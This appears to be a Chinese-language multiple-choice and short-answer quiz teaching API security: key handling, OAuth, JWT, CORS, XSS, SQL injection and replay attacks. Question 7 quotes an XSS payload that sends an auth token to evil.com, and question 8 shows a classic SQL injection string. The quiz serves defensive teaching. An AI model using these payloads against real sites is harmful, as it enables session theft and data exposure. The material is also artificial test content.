已作答 0 / 10 題
API Key 安全
1. 以下哪個做法會讓 API Key 暴露在安全風險中? A) 將 API Key 存在後端伺服器的環境變數 B) 將 API Key 直接寫入前端 JavaScript 程式碼 C) 將 API Key 存在伺服器的 .env 檔並加入 .gitignore 請輸入正確答案字母。
API Key 安全
2. 某電商工程師在 GitHub 上把含有 AWS API Key 的程式碼設為 Public Repository。最可能發生的後果是? A) 沒有影響,因為 GitHub 有保護機制 B) API Key 被掃描工具發現,帳號被用來大量開雲端主機,產生高額費用 C) GitHub 會自動把 Key 隱藏起來 請輸入正確答案字母。
認證方式
3. 你的電商平台要讓用戶「用 Google 帳號登入」。應該使用哪種認證方式? A) API Key B) OAuth C) JWT 請輸入正確答案字母。
認證方式
4. JWT(JSON Web Token)的 Payload 裡存的資料,用戶可以解碼看到嗎? A) 不行,Payload 是加密的 B) 可以,Payload 是 Base64 編碼,可以用線上工具解碼 C) 只有後端伺服器看得到 請輸入正確答案字母。
CORS
5. 前端部署在 https://shop.example.com,呼叫 https://api.orders.com 的 API,瀏覽器報 CORS 錯誤。但用 Postman 測試同一個 API 卻完全正常。這是為什麼? 請用一到兩句話解釋。
CORS
6. API 伺服器設定了 Access-Control-Allow-Origin: * 允許所有來源。這樣的設定有什麼潛在問題? A) 沒有問題,這樣最方便 B) 任何來源(包含惡意網站)都能呼叫這個 API C) 只有內網可以呼叫 請輸入正確答案字母。
常見攻擊
7. 攻擊者在你電商平台的商品評論功能輸入了:<script>fetch('https://evil.com?token='+localStorage.getItem('auth'))</script> 這是哪種攻擊,目標是什麼?
常見攻擊
8. 你的電商搜尋功能用以下方式組 SQL 查詢: query = "SELECT * FROM products WHERE name = '" + user_input + "'" 攻擊者輸入:' OR '1'='1 組出來的 SQL 會查詢到什麼? A) 什麼都找不到,會報錯 B) 只有名稱符合的商品 C) 資料表裡所有的商品 請輸入正確答案字母。
常見攻擊
9. 你的電商平台退款 API 沒有時間戳驗證。攻擊者錄下了一個合法的退款請求並重新發送。這是哪種攻擊?應該如何防禦?
安全 Checklist
10. 你要把一個金流 API 整合上線。以下哪個行為「不符合」安全最佳實務? A) 開發期間使用 API Sandbox(測試環境)的 Key B) 把 API Key 存在 .env 檔,並把 .env 加入 .gitignore C) 為了方便,把 Production API Key 直接寫在程式碼裡,上線後再移除 D) 設定 API 使用量異常時的警報通知 請輸入正確答案字母。
確認作答完畢後,點擊交卷